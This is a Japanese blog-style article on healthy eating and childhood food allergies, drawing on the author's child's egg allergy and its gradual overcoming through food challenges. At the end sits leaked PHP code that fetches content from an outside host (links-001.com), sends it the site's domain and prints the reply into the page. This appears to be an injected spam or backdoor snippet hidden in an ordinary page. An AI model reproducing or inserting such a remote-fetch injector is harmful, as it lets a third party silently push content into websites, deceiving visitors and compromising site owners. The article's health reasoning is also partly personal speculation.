前へ
次へ

健康食で健全な体を作ろう

健康食を実践しても、見た目の変化は1日では分からないもの、毎日の積み重ねとも言えるでしょう。
離乳食を始めるころから毎日摂取している食材や食品、今の体を作り出した「そのもの」になります。
ということは、生まれてから病弱だという人は、健康食を小さな頃から摂取していれば、健全な体で今を生きているのでしょうか。
実際、食生活の関係は大きいのではないかと思われます。
そうした研究も、世界規模で広がっています。
好き嫌いなく何でも食べることがある意味でよいのですが、その結果、体や見た目をよくすることも、悪くすることにも繋がる可能性も無きにしも非ずです。
その代表例が、食物アレルギーです。
そうした子供が増加傾向にあります。
我が家の子供ですら、卵・バナナ・りんごなどに皮膚反応、呼吸困難をきたすほどに拒否反応を示すアレルギーを持っています。
もちろん、卵は一個食べるだけで元気になれる健康食とも言われています。
しかし、生まれる前には卵を積極的に摂取しており、それが母乳に影響を与えていたのかもしれません。
これこそ、健康食が良くもあり、悪くもある理由です。
母乳で育てていたため、生まれて間もなくすでに食物アレルギーの反応を示しており、離乳食時期には卵を与えることが難しい食生活を経験しています。
しかし、負荷試験によって、あえて食べさせることを始めています。
与え続ければ、拒否反応を示していた卵に対する免疫がつく可能性もあるからです。
現に、与え続けることで卵を克服しています。
これを今ではなく、幼児期に行っていれば、健全な体で今を生きていたのかもしれません。
今、品種改良などによりどんどん新しい食材が生まれていて、それが誰かの健康的な食になり得る時代が到来しているのではないでしょうか。
もちろん、もともと病弱であるなら、食も細いはずです。
栄養があるものですら消化吸収できないこともあります。
食のスタイルを変えることは難しいかもしれませんが、少しずつ変える努力は必要です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top